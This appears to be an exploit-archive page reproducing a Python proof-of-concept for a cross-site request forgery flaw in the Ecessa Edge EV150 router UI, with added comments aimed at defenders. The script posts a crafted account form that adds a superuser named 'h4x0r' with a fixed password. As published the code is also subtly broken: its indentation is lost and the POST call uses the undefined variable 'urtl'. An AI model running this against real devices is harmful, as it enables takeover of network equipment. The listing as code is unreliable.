





Ecessa Edge EV150 Cross-Site Request Forgery (Add Superuser)

CVE Category Price Severity
N/A CWE-352 N/A N/A
Author Risk Exploitation Type Date
N/A High Remote 2019-03-26
CPE
cpe:/a:ecessa:edge_ev150
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030217

Below is a copy:

Ecessa Edge EV150 Cross-Site Request Forgery (Add Superuser)
#!/usr/bin/pythono
#Exploit Title: 
#Date: 3/25/2019
#Exploit Author: BehzaDghat
#Version: 10.7.4
#CVE : 2018-13032
import sys
import requests
# Path of the web-UI handler the script sends the account form to. The
# "util_configlogin" part matches the 'page' field of the form body below,
# so this appears to be the handler for the user-accounts page.
# Defender note: this is a state-changing endpoint; POSTs to this path are
# the requests to look for in proxy and web-server logs.
au = "/cgi-bin/pl_web.cgi/util_configlogin_act"
def help_message():
    """Print the usage text, substituting the script name (sys.argv[0])."""
    script_name = sys.argv[0]
    usage_template = """
{} -h ---> show this message

{} -u URL ---> start exploit

example: {} -u http://target.com
"""
    # The template has three placeholders, all filled with the script name.
    print(usage_template.format(script_name, script_name, script_name))
def error_optiont():
    """Print a short hint telling the user to run the script with -h.

    Nothing in the visible listing calls this function; the final ``else``
    branch of the script prints its own hint instead.
    """
    hint_template = """\ntype and enter {} -h"""
    print(hint_template.format(sys.argv[0]))
# Form body submitted to the user-accounts handler. It describes four account
# slots; slots 1-3 carry empty password fields, and slot 4 defines a new
# account with the superuser flag switched on.
#
# Defender notes:
# - 'page_uuid' is a fixed literal, not a value fetched per session. If the
#   device accepts a static or replayed value here, the field is not acting
#   as an anti-CSRF token. Presumably it is server-issued; confirm on the
#   device.
# - The slot-4 username and password are sample values from this listing.
#   When auditing, look for any unexpected superuser account and for the
#   request shape (a POST carrying user_superuserN=on), not for this name.
# - The original literal listed 'savecrtcfg' twice with the same value; it
#   is written once here, which yields an identical dict.
data_fs = {
    "savecrtcfg": "checked",
    # account slot 1
    "user_username1": "root",
    "user_enabled1": "on",
    "user_passwd1": "",
    "user_passwd_verify1": "",
    "user_delete1": "",
    # account slot 2 (key spelled exactly as published)
    "user_username2r": "admin",
    "user_passwd2": "",
    "user_passwd_verify2": "",
    "user_delete2": "",
    # account slot 3
    "user_username3": "user",
    "user_enabled3": "on",
    "user_passwd3": "",
    "user_passwd_verify3": "",
    "user_delete3": "",
    # account slot 4: the added account, superuser flag set
    "user_username4": "h4x0r",
    "user_enabled4": "on",
    "user_superuser4": "on",
    "user_passwd4": "123123",
    "user_passwd_verify4": "123123",
    # page and form bookkeeping fields
    "page": "util_configlogin",
    "val_requested_page": "user_accounts",
    "page_uuid": "3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d",
    "form_has_changed": "1",
    "submit": "Supersize!",
}
# Command-line dispatch: "-h" prints usage and exits; "-u URL" runs the
# request sequence; anything else prints a hint.
# NOTE(review): indentation was lost when this listing was copied, so the
# pairing of the two `else:` lines below with their `if` is ambiguous. The
# code is left exactly as published (Python 2 print statements included)
# and does not run in this form.
#
# Defender notes for the handler this script addresses:
# - Neither request below passes cookies, credentials or custom headers. A
#   handler that changes accounts should require an authenticated session
#   and a per-session anti-CSRF token, and should check Origin/Referer.
# - Adding or promoting a superuser is a good place to require
#   re-authentication.
# - In logs, look for POSTs to the account handler with no Referer or a
#   foreign one, followed by a new privileged account on the device.
if len(sys.argv)>1 and sys.argv[1]=='-h':
help_message()
exit()
elif len(sys.argv)==3 and sys.argv[1]=='-u':
# Full request URL = user-supplied base URL + the handler path in `au`.
urlt=sys.argv[2]+au
# Probe with a GET first. str() of a requests Response is
# "<Response [code]>", so this substring test only checks the status code.
if '200' in str(requests.get(urlt)):
print 'Send DATA'
# The account form (data_fs) is submitted as a form-encoded POST body here.
r=requests.post(urtl,data=data_fs)
# Same status-code test as above. A 200 does not prove the account was
# created; the script never reads back the account list.
if '200' in str(r):
print 'Added User'
else:
print 'Not Found Page'
else:
print 'Type And Enter -> python {} -h'.format(sys.argv[0])
